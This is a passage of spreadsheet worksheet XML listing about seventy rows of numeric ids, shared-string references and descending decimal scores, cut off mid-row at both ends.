      <c r="F16477" s="2">
        <v>0.1765232974910395</v>
      </c>
    </row>
    <row r="16478" ht="15.75" customHeight="1">
      <c r="A16478" s="1">
        <v>16279.0</v>
      </c>
      <c r="B16478" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C16478" s="2" t="s">
        <v>15902</v>
      </c>
      <c r="D16478" s="2">
        <v>1.0</v>
      </c>
      <c r="E16478" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16478" s="2">
        <v>0.1764132553606239</v>
      </c>
    </row>
    <row r="16479" ht="15.75" customHeight="1">
      <c r="A16479" s="1">
        <v>31507.0</v>
      </c>
      <c r="B16479" s="2">
        <v>5072668.0</v>
      </c>
      <c r="C16479" s="2" t="s">
        <v>15903</v>
      </c>
      <c r="D16479" s="2">
        <v>1.0</v>
      </c>
      <c r="E16479" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16479" s="2">
        <v>0.1757741347905283</v>
      </c>
    </row>
    <row r="16480" ht="15.75" customHeight="1">
      <c r="A16480" s="1">
        <v>15908.0</v>
      </c>
      <c r="B16480" s="2">
        <v>4.4628828E7</v>
      </c>
      <c r="C16480" s="2" t="s">
        <v>15904</v>
      </c>
      <c r="D16480" s="2">
        <v>1.0</v>
      </c>
      <c r="E16480" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16480" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16481" ht="15.75" customHeight="1">
      <c r="A16481" s="1">
        <v>20771.0</v>
      </c>
      <c r="B16481" s="2">
        <v>1.4971508E7</v>
      </c>
      <c r="C16481" s="2" t="s">
        <v>15905</v>
      </c>
      <c r="D16481" s="2">
        <v>1.0</v>
      </c>
      <c r="E16481" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16481" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16482" ht="15.75" customHeight="1">
      <c r="A16482" s="1">
        <v>25703.0</v>
      </c>
      <c r="B16482" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C16482" s="2" t="s">
        <v>15906</v>
      </c>
      <c r="D16482" s="2">
        <v>1.0</v>
      </c>
      <c r="E16482" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16482" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16483" ht="15.75" customHeight="1">
      <c r="A16483" s="1">
        <v>25716.0</v>
      </c>
      <c r="B16483" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C16483" s="2" t="s">
        <v>15907</v>
      </c>
      <c r="D16483" s="2">
        <v>1.0</v>
      </c>
      <c r="E16483" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16483" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16484" ht="15.75" customHeight="1">
      <c r="A16484" s="1">
        <v>25785.0</v>
      </c>
      <c r="B16484" s="2">
        <v>1.4671598E7</v>
      </c>
      <c r="C16484" s="2" t="s">
        <v>15908</v>
      </c>
      <c r="D16484" s="2">
        <v>1.0</v>
      </c>
      <c r="E16484" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16484" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16485" ht="15.75" customHeight="1">
      <c r="A16485" s="1">
        <v>30922.0</v>
      </c>
      <c r="B16485" s="2">
        <v>4.6930722E7</v>
      </c>
      <c r="C16485" s="2" t="s">
        <v>15909</v>
      </c>
      <c r="D16485" s="2">
        <v>1.0</v>
      </c>
      <c r="E16485" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16485" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16486" ht="15.75" customHeight="1">
      <c r="A16486" s="1">
        <v>31496.0</v>
      </c>
      <c r="B16486" s="2">
        <v>5.0643912E7</v>
      </c>
      <c r="C16486" s="2" t="s">
        <v>15910</v>
      </c>
      <c r="D16486" s="2">
        <v>1.0</v>
      </c>
      <c r="E16486" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16486" s="2">
        <v>0.1752873563218391</v>
      </c>
    </row>
    <row r="16487" ht="15.75" customHeight="1">
      <c r="A16487" s="1">
        <v>19804.0</v>
      </c>
      <c r="B16487" s="2">
        <v>5.6882646E7</v>
      </c>
      <c r="C16487" s="2" t="s">
        <v>15911</v>
      </c>
      <c r="D16487" s="2">
        <v>1.0</v>
      </c>
      <c r="E16487" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16487" s="2">
        <v>0.1752136752136753</v>
      </c>
    </row>
    <row r="16488" ht="15.75" customHeight="1">
      <c r="A16488" s="1">
        <v>13027.0</v>
      </c>
      <c r="B16488" s="2">
        <v>3294839.0</v>
      </c>
      <c r="C16488" s="2" t="s">
        <v>15912</v>
      </c>
      <c r="D16488" s="2">
        <v>1.0</v>
      </c>
      <c r="E16488" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16488" s="2">
        <v>0.1749585406301824</v>
      </c>
    </row>
    <row r="16489" ht="15.75" customHeight="1">
      <c r="A16489" s="1">
        <v>12724.0</v>
      </c>
      <c r="B16489" s="2">
        <v>3.0909012E7</v>
      </c>
      <c r="C16489" s="2" t="s">
        <v>15913</v>
      </c>
      <c r="D16489" s="2">
        <v>1.0</v>
      </c>
      <c r="E16489" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16489" s="2">
        <v>0.1747181964573269</v>
      </c>
    </row>
    <row r="16490" ht="15.75" customHeight="1">
      <c r="A16490" s="1">
        <v>23702.0</v>
      </c>
      <c r="B16490" s="2">
        <v>7086251.0</v>
      </c>
      <c r="C16490" s="2" t="s">
        <v>15914</v>
      </c>
      <c r="D16490" s="2">
        <v>1.0</v>
      </c>
      <c r="E16490" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16490" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="16491" ht="15.75" customHeight="1">
      <c r="A16491" s="1">
        <v>25126.0</v>
      </c>
      <c r="B16491" s="2">
        <v>1.3015079E7</v>
      </c>
      <c r="C16491" s="2" t="s">
        <v>15915</v>
      </c>
      <c r="D16491" s="2">
        <v>1.0</v>
      </c>
      <c r="E16491" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16491" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="16492" ht="15.75" customHeight="1">
      <c r="A16492" s="1">
        <v>33143.0</v>
      </c>
      <c r="B16492" s="2">
        <v>7065764.0</v>
      </c>
      <c r="C16492" s="2" t="s">
        <v>15916</v>
      </c>
      <c r="D16492" s="2">
        <v>1.0</v>
      </c>
      <c r="E16492" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16492" s="2">
        <v>0.1744791666666667</v>
      </c>
    </row>
    <row r="16493" ht="15.75" customHeight="1">
      <c r="A16493" s="1">
        <v>26165.0</v>
      </c>
      <c r="B16493" s="2">
        <v>1.609768E7</v>
      </c>
      <c r="C16493" s="2" t="s">
        <v>15888</v>
      </c>
      <c r="D16493" s="2">
        <v>1.0</v>
      </c>
      <c r="E16493" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16493" s="2">
        <v>0.1744639376218324</v>
      </c>
    </row>
    <row r="16494" ht="15.75" customHeight="1">
      <c r="A16494" s="1">
        <v>14642.0</v>
      </c>
      <c r="B16494" s="2">
        <v>4.0354266E7</v>
      </c>
      <c r="C16494" s="2" t="s">
        <v>15917</v>
      </c>
      <c r="D16494" s="2">
        <v>1.0</v>
      </c>
      <c r="E16494" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16494" s="2">
        <v>0.1739526411657559</v>
      </c>
    </row>
    <row r="16495" ht="15.75" customHeight="1">
      <c r="A16495" s="1">
        <v>27887.0</v>
      </c>
      <c r="B16495" s="2">
        <v>2.3590073E7</v>
      </c>
      <c r="C16495" s="2" t="s">
        <v>15918</v>
      </c>
      <c r="D16495" s="2">
        <v>1.0</v>
      </c>
      <c r="E16495" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16495" s="2">
        <v>0.1737213403880071</v>
      </c>
    </row>
    <row r="16496" ht="15.75" customHeight="1">
      <c r="A16496" s="1">
        <v>20726.0</v>
      </c>
      <c r="B16496" s="2">
        <v>1.4671599E7</v>
      </c>
      <c r="C16496" s="2" t="s">
        <v>15908</v>
      </c>
      <c r="D16496" s="2">
        <v>1.0</v>
      </c>
      <c r="E16496" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16496" s="2">
        <v>0.1733716475095785</v>
      </c>
    </row>
    <row r="16497" ht="15.75" customHeight="1">
      <c r="A16497" s="1">
        <v>16137.0</v>
      </c>
      <c r="B16497" s="2">
        <v>4.554479E7</v>
      </c>
      <c r="C16497" s="2" t="s">
        <v>15919</v>
      </c>
      <c r="D16497" s="2">
        <v>1.0</v>
      </c>
      <c r="E16497" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16497" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="16498" ht="15.75" customHeight="1">
      <c r="A16498" s="1">
        <v>21158.0</v>
      </c>
      <c r="B16498" s="2">
        <v>1.8878162E7</v>
      </c>
      <c r="C16498" s="2" t="s">
        <v>15920</v>
      </c>
      <c r="D16498" s="2">
        <v>1.0</v>
      </c>
      <c r="E16498" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16498" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="16499" ht="15.75" customHeight="1">
      <c r="A16499" s="1">
        <v>24392.0</v>
      </c>
      <c r="B16499" s="2">
        <v>1.0783157E7</v>
      </c>
      <c r="C16499" s="2" t="s">
        <v>15921</v>
      </c>
      <c r="D16499" s="2">
        <v>1.0</v>
      </c>
      <c r="E16499" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16499" s="2">
        <v>0.172316384180791</v>
      </c>
    </row>
    <row r="16500" ht="15.75" customHeight="1">
      <c r="A16500" s="1">
        <v>30903.0</v>
      </c>
      <c r="B16500" s="2">
        <v>4.6743593E7</v>
      </c>
      <c r="C16500" s="2" t="s">
        <v>15922</v>
      </c>
      <c r="D16500" s="2">
        <v>1.0</v>
      </c>
      <c r="E16500" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16500" s="2">
        <v>0.1722222222222223</v>
      </c>
    </row>
    <row r="16501" ht="15.75" customHeight="1">
      <c r="A16501" s="1">
        <v>31733.0</v>
      </c>
      <c r="B16501" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C16501" s="2" t="s">
        <v>15923</v>
      </c>
      <c r="D16501" s="2">
        <v>1.0</v>
      </c>
      <c r="E16501" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16501" s="2">
        <v>0.1716269841269842</v>
      </c>
    </row>
    <row r="16502" ht="15.75" customHeight="1">
      <c r="A16502" s="1">
        <v>15065.0</v>
      </c>
      <c r="B16502" s="2">
        <v>4.1711126E7</v>
      </c>
      <c r="C16502" s="2" t="s">
        <v>15924</v>
      </c>
      <c r="D16502" s="2">
        <v>1.0</v>
      </c>
      <c r="E16502" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16502" s="2">
        <v>0.171455938697318</v>
      </c>
    </row>
    <row r="16503" ht="15.75" customHeight="1">
      <c r="A16503" s="1">
        <v>9999.0</v>
      </c>
      <c r="B16503" s="2">
        <v>5.7007343E7</v>
      </c>
      <c r="C16503" s="2" t="s">
        <v>15925</v>
      </c>
      <c r="D16503" s="2">
        <v>1.0</v>
      </c>
      <c r="E16503" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16503" s="2">
        <v>0.1713615023474179</v>
      </c>
    </row>
    <row r="16504" ht="15.75" customHeight="1">
      <c r="A16504" s="1">
        <v>344.0</v>
      </c>
      <c r="B16504" s="2">
        <v>1.5922714E7</v>
      </c>
      <c r="C16504" s="2" t="s">
        <v>15926</v>
      </c>
      <c r="D16504" s="2">
        <v>1.0</v>
      </c>
      <c r="E16504" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16504" s="2">
        <v>0.1703096539162113</v>
      </c>
    </row>
    <row r="16505" ht="15.75" customHeight="1">
      <c r="A16505" s="1">
        <v>23691.0</v>
      </c>
      <c r="B16505" s="2">
        <v>7060460.0</v>
      </c>
      <c r="C16505" s="2" t="s">
        <v>15927</v>
      </c>
      <c r="D16505" s="2">
        <v>1.0</v>
      </c>
      <c r="E16505" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16505" s="2">
        <v>0.1700854700854701</v>
      </c>
    </row>
    <row r="16506" ht="15.75" customHeight="1">
      <c r="A16506" s="1">
        <v>16168.0</v>
      </c>
      <c r="B16506" s="2">
        <v>4.5625432E7</v>
      </c>
      <c r="C16506" s="2" t="s">
        <v>15928</v>
      </c>
      <c r="D16506" s="2">
        <v>1.0</v>
      </c>
      <c r="E16506" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16506" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="16507" ht="15.75" customHeight="1">
      <c r="A16507" s="1">
        <v>22260.0</v>
      </c>
      <c r="B16507" s="2">
        <v>3.2838232E7</v>
      </c>
      <c r="C16507" s="2" t="s">
        <v>15929</v>
      </c>
      <c r="D16507" s="2">
        <v>1.0</v>
      </c>
      <c r="E16507" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16507" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="16508" ht="15.75" customHeight="1">
      <c r="A16508" s="1">
        <v>29541.0</v>
      </c>
      <c r="B16508" s="2">
        <v>3.2838231E7</v>
      </c>
      <c r="C16508" s="2" t="s">
        <v>15929</v>
      </c>
      <c r="D16508" s="2">
        <v>1.0</v>
      </c>
      <c r="E16508" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16508" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="16509" ht="15.75" customHeight="1">
      <c r="A16509" s="1">
        <v>31701.0</v>
      </c>
      <c r="B16509" s="2">
        <v>5.1976531E7</v>
      </c>
      <c r="C16509" s="2" t="s">
        <v>15930</v>
      </c>
      <c r="D16509" s="2">
        <v>1.0</v>
      </c>
      <c r="E16509" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16509" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="16510" ht="15.75" customHeight="1">
      <c r="A16510" s="1">
        <v>33282.0</v>
      </c>
      <c r="B16510" s="2">
        <v>7430209.0</v>
      </c>
      <c r="C16510" s="2" t="s">
        <v>15931</v>
      </c>
      <c r="D16510" s="2">
        <v>1.0</v>
      </c>
      <c r="E16510" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16510" s="2">
        <v>0.1694444444444445</v>
      </c>
    </row>
    <row r="16511" ht="15.75" customHeight="1">
      <c r="A16511" s="1">
        <v>25556.0</v>
      </c>
      <c r="B16511" s="2">
        <v>1.4280844E7</v>
      </c>
      <c r="C16511" s="2" t="s">
        <v>15932</v>
      </c>
      <c r="D16511" s="2">
        <v>1.0</v>
      </c>
      <c r="E16511" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16511" s="2">
        <v>0.1691176470588236</v>
      </c>
    </row>
    <row r="16512" ht="15.75" customHeight="1">
      <c r="A16512" s="1">
        <v>17398.0</v>
      </c>
      <c r="B16512" s="2">
        <v>4.9629376E7</v>
      </c>
      <c r="C16512" s="2" t="s">
        <v>15933</v>
      </c>
      <c r="D16512" s="2">
        <v>1.0</v>
      </c>
      <c r="E16512" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16512" s="2">
        <v>0.1689814814814815</v>
      </c>
    </row>
    <row r="16513" ht="15.75" customHeight="1">
      <c r="A16513" s="1">
        <v>25681.0</v>
      </c>
      <c r="B16513" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16513" s="2" t="s">
        <v>15934</v>
      </c>
      <c r="D16513" s="2">
        <v>1.0</v>
      </c>
      <c r="E16513" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16513" s="2">
        <v>0.1686159844054581</v>
      </c>
    </row>
    <row r="16514" ht="15.75" customHeight="1">
      <c r="A16514" s="1">
        <v>26022.0</v>
      </c>
      <c r="B16514" s="2">
        <v>1.5373804E7</v>
      </c>
      <c r="C16514" s="2" t="s">
        <v>15935</v>
      </c>
      <c r="D16514" s="2">
        <v>1.0</v>
      </c>
      <c r="E16514" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16514" s="2">
        <v>0.1684303350970018</v>
      </c>
    </row>
    <row r="16515" ht="15.75" customHeight="1">
      <c r="A16515" s="1">
        <v>33132.0</v>
      </c>
      <c r="B16515" s="2">
        <v>7060459.0</v>
      </c>
      <c r="C16515" s="2" t="s">
        <v>15927</v>
      </c>
      <c r="D16515" s="2">
        <v>1.0</v>
      </c>
      <c r="E16515" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16515" s="2">
        <v>0.1683760683760684</v>
      </c>
    </row>
    <row r="16516" ht="15.75" customHeight="1">
      <c r="A16516" s="1">
        <v>17793.0</v>
      </c>
      <c r="B16516" s="2">
        <v>5.0801358E7</v>
      </c>
      <c r="C16516" s="2" t="s">
        <v>15936</v>
      </c>
      <c r="D16516" s="2">
        <v>1.0</v>
      </c>
      <c r="E16516" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16516" s="2">
        <v>0.1683250414593699</v>
      </c>
    </row>
    <row r="16517" ht="15.75" customHeight="1">
      <c r="A16517" s="1">
        <v>25532.0</v>
      </c>
      <c r="B16517" s="2">
        <v>1.4222297E7</v>
      </c>
      <c r="C16517" s="2" t="s">
        <v>15937</v>
      </c>
      <c r="D16517" s="2">
        <v>1.0</v>
      </c>
      <c r="E16517" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16517" s="2">
        <v>0.1682316118935838</v>
      </c>
    </row>
    <row r="16518" ht="15.75" customHeight="1">
      <c r="A16518" s="1">
        <v>31735.0</v>
      </c>
      <c r="B16518" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C16518" s="2" t="s">
        <v>15938</v>
      </c>
      <c r="D16518" s="2">
        <v>1.0</v>
      </c>
      <c r="E16518" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16518" s="2">
        <v>0.1676587301587303</v>
      </c>
    </row>
    <row r="16519" ht="15.75" customHeight="1">
      <c r="A16519" s="1">
        <v>26329.0</v>
      </c>
      <c r="B16519" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C16519" s="2" t="s">
        <v>15939</v>
      </c>
      <c r="D16519" s="2">
        <v>1.0</v>
      </c>
      <c r="E16519" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16519" s="2">
        <v>0.1675925925925926</v>
      </c>
    </row>
    <row r="16520" ht="15.75" customHeight="1">
      <c r="A16520" s="1">
        <v>25988.0</v>
      </c>
      <c r="B16520" s="2">
        <v>1.5330105E7</v>
      </c>
      <c r="C16520" s="2" t="s">
        <v>15940</v>
      </c>
      <c r="D16520" s="2">
        <v>1.0</v>
      </c>
      <c r="E16520" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16520" s="2">
        <v>0.1674382716049383</v>
      </c>
    </row>
    <row r="16521" ht="15.75" customHeight="1">
      <c r="A16521" s="1">
        <v>28570.0</v>
      </c>
      <c r="B16521" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C16521" s="2" t="s">
        <v>15941</v>
      </c>
      <c r="D16521" s="2">
        <v>1.0</v>
      </c>
      <c r="E16521" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16521" s="2">
        <v>0.1666666666666668</v>
      </c>
    </row>
    <row r="16522" ht="15.75" customHeight="1">
      <c r="A16522" s="1">
        <v>11190.0</v>
      </c>
      <c r="B16522" s="2">
        <v>1.9825441E7</v>
      </c>
      <c r="C16522" s="2" t="s">
        <v>15942</v>
      </c>
      <c r="D16522" s="2">
        <v>1.0</v>
      </c>
      <c r="E16522" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16522" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16523" ht="15.75" customHeight="1">
      <c r="A16523" s="1">
        <v>21616.0</v>
      </c>
      <c r="B16523" s="2">
        <v>2.4567952E7</v>
      </c>
      <c r="C16523" s="2" t="s">
        <v>15943</v>
      </c>
      <c r="D16523" s="2">
        <v>1.0</v>
      </c>
      <c r="E16523" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16523" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16524" ht="15.75" customHeight="1">
      <c r="A16524" s="1">
        <v>21727.0</v>
      </c>
      <c r="B16524" s="2">
        <v>2.5684761E7</v>
      </c>
      <c r="C16524" s="2" t="s">
        <v>15944</v>
      </c>
      <c r="D16524" s="2">
        <v>1.0</v>
      </c>
      <c r="E16524" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16524" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16525" ht="15.75" customHeight="1">
      <c r="A16525" s="1">
        <v>22810.0</v>
      </c>
      <c r="B16525" s="2">
        <v>4.6022586E7</v>
      </c>
      <c r="C16525" s="2" t="s">
        <v>15945</v>
      </c>
      <c r="D16525" s="2">
        <v>1.0</v>
      </c>
      <c r="E16525" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16525" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16526" ht="15.75" customHeight="1">
      <c r="A16526" s="1">
        <v>24299.0</v>
      </c>
      <c r="B16526" s="2">
        <v>1.0561467E7</v>
      </c>
      <c r="C16526" s="2" t="s">
        <v>15946</v>
      </c>
      <c r="D16526" s="2">
        <v>1.0</v>
      </c>
      <c r="E16526" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16526" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16527" ht="15.75" customHeight="1">
      <c r="A16527" s="1">
        <v>25759.0</v>
      </c>
      <c r="B16527" s="2">
        <v>1.4624992E7</v>
      </c>
      <c r="C16527" s="2" t="s">
        <v>15947</v>
      </c>
      <c r="D16527" s="2">
        <v>1.0</v>
      </c>
      <c r="E16527" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16527" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16528" ht="15.75" customHeight="1">
      <c r="A16528" s="1">
        <v>28310.0</v>
      </c>
      <c r="B16528" s="2">
        <v>2.568476E7</v>
      </c>
      <c r="C16528" s="2" t="s">
        <v>15944</v>
      </c>
      <c r="D16528" s="2">
        <v>1.0</v>
      </c>
      <c r="E16528" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16528" s="2">
        <v>0.1666666666666667</v>
      </c>
    </row>
    <row r="16529" ht="15.75" customHeight="1">
      <c r="A16529" s="1">
        <v>31951.0</v>
      </c>
      <c r="B16529" s="2">
        <v>5310073.0</v>
      </c>
      <c r="C16529" s="2" t="s">
        <v>15948</v>
      </c>
      <c r="D16529" s="2">
        <v>1.0</v>
      </c>
      <c r="E16529" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16529" s="2">
        <v>0.1648451730418944</v>
      </c>
    </row>
    <row r="16530" ht="15.75" customHeight="1">
      <c r="A16530" s="1">
        <v>30341.0</v>
      </c>
      <c r="B16530" s="2">
        <v>3.8174218E7</v>
      </c>
      <c r="C16530" s="2" t="s">
        <v>15949</v>
      </c>
      <c r="D16530" s="2">
        <v>1.0</v>
      </c>
      <c r="E16530" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16530" s="2">
        <v>0.1647834274952919</v>
      </c>
    </row>
    <row r="16531" ht="15.75" customHeight="1">
      <c r="A16531" s="1">
        <v>23548.0</v>
      </c>
      <c r="B16531" s="2">
        <v>6053758.0</v>
      </c>
      <c r="C16531" s="2" t="s">
        <v>15950</v>
      </c>
      <c r="D16531" s="2">
        <v>1.0</v>
      </c>
      <c r="E16531" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16531" s="2">
        <v>0.1646464646464647</v>
      </c>
    </row>
    <row r="16532" ht="15.75" customHeight="1">
      <c r="A16532" s="1">
        <v>10459.0</v>
      </c>
      <c r="B16532" s="2">
        <v>1.0717439E7</v>
      </c>
      <c r="C16532" s="2" t="s">
        <v>15951</v>
      </c>
      <c r="D16532" s="2">
        <v>1.0</v>
      </c>
      <c r="E16532" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16532" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="16533" ht="15.75" customHeight="1">
      <c r="A16533" s="1">
        <v>19110.0</v>
      </c>
      <c r="B16533" s="2">
        <v>5.4734661E7</v>
      </c>
      <c r="C16533" s="2" t="s">
        <v>15952</v>
      </c>
      <c r="D16533" s="2">
        <v>1.0</v>
      </c>
      <c r="E16533" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16533" s="2">
        <v>0.1642156862745099</v>
      </c>
    </row>
    <row r="16534" ht="15.75" customHeight="1">
      <c r="A16534" s="1">
        <v>1838.0</v>
      </c>
      <c r="B16534" s="2">
        <v>2.9385417E7</v>
      </c>
      <c r="C16534" s="2" t="s">
        <v>15953</v>
      </c>
      <c r="D16534" s="2">
        <v>1.0</v>
      </c>
      <c r="E16534" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16534" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16535" ht="15.75" customHeight="1">
      <c r="A16535" s="1">
        <v>14036.0</v>
      </c>
      <c r="B16535" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C16535" s="2" t="s">
        <v>15954</v>
      </c>
      <c r="D16535" s="2">
        <v>1.0</v>
      </c>
      <c r="E16535" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16535" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16536" ht="15.75" customHeight="1">
      <c r="A16536" s="1">
        <v>25069.0</v>
      </c>
      <c r="B16536" s="2">
        <v>1.2875858E7</v>
      </c>
      <c r="C16536" s="2" t="s">
        <v>15955</v>
      </c>
      <c r="D16536" s="2">
        <v>1.0</v>
      </c>
      <c r="E16536" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16536" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16537" ht="15.75" customHeight="1">
      <c r="A16537" s="1">
        <v>25640.0</v>
      </c>
      <c r="B16537" s="2">
        <v>1.4497765E7</v>
      </c>
      <c r="C16537" s="2" t="s">
        <v>15956</v>
      </c>
      <c r="D16537" s="2">
        <v>1.0</v>
      </c>
      <c r="E16537" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16537" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16538" ht="15.75" customHeight="1">
      <c r="A16538" s="1">
        <v>25677.0</v>
      </c>
      <c r="B16538" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C16538" s="2" t="s">
        <v>15957</v>
      </c>
      <c r="D16538" s="2">
        <v>1.0</v>
      </c>
      <c r="E16538" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16538" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16539" ht="15.75" customHeight="1">
      <c r="A16539" s="1">
        <v>27626.0</v>
      </c>
      <c r="B16539" s="2">
        <v>2.2701103E7</v>
      </c>
      <c r="C16539" s="2" t="s">
        <v>15958</v>
      </c>
      <c r="D16539" s="2">
        <v>1.0</v>
      </c>
      <c r="E16539" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16539" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16540" ht="15.75" customHeight="1">
      <c r="A16540" s="1">
        <v>28051.0</v>
      </c>
      <c r="B16540" s="2">
        <v>2.4567951E7</v>
      </c>
      <c r="C16540" s="2" t="s">
        <v>15959</v>
      </c>
      <c r="D16540" s="2">
        <v>1.0</v>
      </c>
      <c r="E16540" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16540" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16541" ht="15.75" customHeight="1">
      <c r="A16541" s="1">
        <v>28574.0</v>
      </c>
      <c r="B16541" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C16541" s="2" t="s">
        <v>15960</v>
      </c>
      <c r="D16541" s="2">
        <v>1.0</v>
      </c>
      <c r="E16541" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16541" s="2">
        <v>0.163978494623656</v>
      </c>
    </row>
    <row r="16542" ht="15.75" customHeight="1">
      <c r="A16542" s="1">
        <v>337.0</v>
      </c>
      <c r="B16542" s="2">
        <v>1.585167E7</v>
      </c>
      <c r="C16542" s="2" t="s">
        <v>15961</v>
      </c>
      <c r="D16542" s="2">
        <v>1.0</v>
      </c>
      <c r="E16542" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16542" s="2">
        <v>0.1638888888888889</v>
      </c>
    </row>
    <row r="16543" ht="15.75" customHeight="1">
      <c r="A16543" s="1">
        <v>27311.0</v>
      </c>
      <c r="B16543" s="2">
        <v>2.1366991E7</v>
      </c>
      <c r="C16543" s="2" t="s">
        <v>15962</v>
      </c>
      <c r="D16543" s="2">
        <v>1.0</v>
      </c>
      <c r="E16543" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16543" s="2">
        <v>0.1637037037037037</v>
      </c>
    </row>
    <row r="16544" ht="15.75" customHeight="1">
      <c r="A16544" s="1">
        <v>23251.0</v>
      </c>
      <c r="B16544" s="2">
        <v>5310074.0</v>
      </c>
      <c r="C16544" s="2" t="s">
        <v>15963</v>
      </c>
      <c r="D16544" s="2">
        <v>1.0</v>
      </c>
      <c r="E16544" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F16544" s="2">
        <v>0.1636904761904763</v>
